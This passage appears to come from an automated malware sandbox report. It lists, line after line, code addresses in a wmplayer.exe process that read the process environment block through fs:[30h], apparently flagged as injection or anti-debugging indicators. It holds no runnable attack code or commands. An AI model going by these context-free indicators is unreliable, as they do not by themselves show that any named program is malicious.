          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F92A6 mov eax, dword ptr fs:[00000030h]6_2_038F92A6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F92A6 mov eax, dword ptr fs:[00000030h]6_2_038F92A6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F92A6 mov eax, dword ptr fs:[00000030h]6_2_038F92A6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]6_2_038C62A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C62A0 mov ecx, dword ptr fs:[00000030h]6_2_038C62A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]6_2_038C62A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]6_2_038C62A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]6_2_038C62A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]6_2_038C62A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C72A0 mov eax, dword ptr fs:[00000030h]6_2_038C72A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C72A0 mov eax, dword ptr fs:[00000030h]6_2_038C72A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B92BC mov eax, dword ptr fs:[00000030h]6_2_038B92BC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B92BC mov eax, dword ptr fs:[00000030h]6_2_038B92BC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B92BC mov ecx, dword ptr fs:[00000030h]6_2_038B92BC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B92BC mov ecx, dword ptr fs:[00000030h]6_2_038B92BC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]6_2_0383A2C3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]6_2_0383A2C3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]6_2_0383A2C3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]6_2_0383A2C3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]6_2_0383A2C3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]6_2_0385B2C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]6_2_0385B2C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]6_2_0385B2C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]6_2_0385B2C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]6_2_0385B2C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]6_2_0385B2C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]6_2_0385B2C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038392C5 mov eax, dword ptr fs:[00000030h]6_2_038392C5
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038392C5 mov eax, dword ptr fs:[00000030h]6_2_038392C5
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B2D3 mov eax, dword ptr fs:[00000030h]6_2_0382B2D3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B2D3 mov eax, dword ptr fs:[00000030h]6_2_0382B2D3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B2D3 mov eax, dword ptr fs:[00000030h]6_2_0382B2D3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385F2D0 mov eax, dword ptr fs:[00000030h]6_2_0385F2D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385F2D0 mov eax, dword ptr fs:[00000030h]6_2_0385F2D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038402E1 mov eax, dword ptr fs:[00000030h]6_2_038402E1
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038402E1 mov eax, dword ptr fs:[00000030h]6_2_038402E1
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038402E1 mov eax, dword ptr fs:[00000030h]6_2_038402E1
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039052E2 mov eax, dword ptr fs:[00000030h]6_2_039052E2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EF2F8 mov eax, dword ptr fs:[00000030h]6_2_038EF2F8
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038292FF mov eax, dword ptr fs:[00000030h]6_2_038292FF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03867208 mov eax, dword ptr fs:[00000030h]6_2_03867208
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03867208 mov eax, dword ptr fs:[00000030h]6_2_03867208
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03905227 mov eax, dword ptr fs:[00000030h]6_2_03905227
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382823B mov eax, dword ptr fs:[00000030h]6_2_0382823B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829240 mov eax, dword ptr fs:[00000030h]6_2_03829240
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829240 mov eax, dword ptr fs:[00000030h]6_2_03829240
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386724D mov eax, dword ptr fs:[00000030h]6_2_0386724D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382A250 mov eax, dword ptr fs:[00000030h]6_2_0382A250
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EB256 mov eax, dword ptr fs:[00000030h]6_2_038EB256
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EB256 mov eax, dword ptr fs:[00000030h]6_2_038EB256
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03836259 mov eax, dword ptr fs:[00000030h]6_2_03836259
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03834260 mov eax, dword ptr fs:[00000030h]6_2_03834260
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03834260 mov eax, dword ptr fs:[00000030h]6_2_03834260
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03834260 mov eax, dword ptr fs:[00000030h]6_2_03834260
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FD26B mov eax, dword ptr fs:[00000030h]6_2_038FD26B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FD26B mov eax, dword ptr fs:[00000030h]6_2_038FD26B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382826B mov eax, dword ptr fs:[00000030h]6_2_0382826B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03859274 mov eax, dword ptr fs:[00000030h]6_2_03859274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03871270 mov eax, dword ptr fs:[00000030h]6_2_03871270
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03871270 mov eax, dword ptr fs:[00000030h]6_2_03871270
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]6_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03870185 mov eax, dword ptr fs:[00000030h]6_2_03870185
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EC188 mov eax, dword ptr fs:[00000030h]6_2_038EC188
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EC188 mov eax, dword ptr fs:[00000030h]6_2_038EC188
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B019F mov eax, dword ptr fs:[00000030h]6_2_038B019F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B019F mov eax, dword ptr fs:[00000030h]6_2_038B019F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B019F mov eax, dword ptr fs:[00000030h]6_2_038B019F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B019F mov eax, dword ptr fs:[00000030h]6_2_038B019F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382A197 mov eax, dword ptr fs:[00000030h]6_2_0382A197
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382A197 mov eax, dword ptr fs:[00000030h]6_2_0382A197
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382A197 mov eax, dword ptr fs:[00000030h]6_2_0382A197
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03887190 mov eax, dword ptr fs:[00000030h]6_2_03887190
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E11A4 mov eax, dword ptr fs:[00000030h]6_2_038E11A4
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E11A4 mov eax, dword ptr fs:[00000030h]6_2_038E11A4
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E11A4 mov eax, dword ptr fs:[00000030h]6_2_038E11A4
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E11A4 mov eax, dword ptr fs:[00000030h]6_2_038E11A4
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384B1B0 mov eax, dword ptr fs:[00000030h]6_2_0384B1B0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F61C3 mov eax, dword ptr fs:[00000030h]6_2_038F61C3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F61C3 mov eax, dword ptr fs:[00000030h]6_2_038F61C3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386D1D0 mov eax, dword ptr fs:[00000030h]6_2_0386D1D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386D1D0 mov ecx, dword ptr fs:[00000030h]6_2_0386D1D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE1D0 mov eax, dword ptr fs:[00000030h]6_2_038AE1D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE1D0 mov eax, dword ptr fs:[00000030h]6_2_038AE1D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]6_2_038AE1D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE1D0 mov eax, dword ptr fs:[00000030h]6_2_038AE1D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE1D0 mov eax, dword ptr fs:[00000030h]6_2_038AE1D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039051CB mov eax, dword ptr fs:[00000030h]6_2_039051CB
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]6_2_038551EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038351ED mov eax, dword ptr fs:[00000030h]6_2_038351ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039061E5 mov eax, dword ptr fs:[00000030h]6_2_039061E5
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038601F8 mov eax, dword ptr fs:[00000030h]6_2_038601F8
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038DA118 mov ecx, dword ptr fs:[00000030h]6_2_038DA118
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038DA118 mov eax, dword ptr fs:[00000030h]6_2_038DA118
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038DA118 mov eax, dword ptr fs:[00000030h]6_2_038DA118
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038DA118 mov eax, dword ptr fs:[00000030h]6_2_038DA118
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F0115 mov eax, dword ptr fs:[00000030h]6_2_038F0115
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03860124 mov eax, dword ptr fs:[00000030h]6_2_03860124
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03831131 mov eax, dword ptr fs:[00000030h]6_2_03831131
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03831131 mov eax, dword ptr fs:[00000030h]6_2_03831131
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B136 mov eax, dword ptr fs:[00000030h]6_2_0382B136
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B136 mov eax, dword ptr fs:[00000030h]6_2_0382B136
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B136 mov eax, dword ptr fs:[00000030h]6_2_0382B136
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B136 mov eax, dword ptr fs:[00000030h]6_2_0382B136
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03905152 mov eax, dword ptr fs:[00000030h]6_2_03905152
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C4144 mov eax, dword ptr fs:[00000030h]6_2_038C4144
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C4144 mov eax, dword ptr fs:[00000030h]6_2_038C4144
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C4144 mov ecx, dword ptr fs:[00000030h]6_2_038C4144
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C4144 mov eax, dword ptr fs:[00000030h]6_2_038C4144
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C4144 mov eax, dword ptr fs:[00000030h]6_2_038C4144
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829148 mov eax, dword ptr fs:[00000030h]6_2_03829148
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829148 mov eax, dword ptr fs:[00000030h]6_2_03829148
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829148 mov eax, dword ptr fs:[00000030h]6_2_03829148
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829148 mov eax, dword ptr fs:[00000030h]6_2_03829148
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03837152 mov eax, dword ptr fs:[00000030h]6_2_03837152
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382C156 mov eax, dword ptr fs:[00000030h]6_2_0382C156
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03836154 mov eax, dword ptr fs:[00000030h]6_2_03836154
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03836154 mov eax, dword ptr fs:[00000030h]6_2_03836154
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]6_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C9179 mov eax, dword ptr fs:[00000030h]6_2_038C9179
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383208A mov eax, dword ptr fs:[00000030h]6_2_0383208A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382D08D mov eax, dword ptr fs:[00000030h]6_2_0382D08D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03835096 mov eax, dword ptr fs:[00000030h]6_2_03835096
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385D090 mov eax, dword ptr fs:[00000030h]6_2_0385D090
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385D090 mov eax, dword ptr fs:[00000030h]6_2_0385D090
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386909C mov eax, dword ptr fs:[00000030h]6_2_0386909C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F60B8 mov eax, dword ptr fs:[00000030h]6_2_038F60B8
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F60B8 mov ecx, dword ptr fs:[00000030h]6_2_038F60B8
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov ecx, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov ecx, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov ecx, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov ecx, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
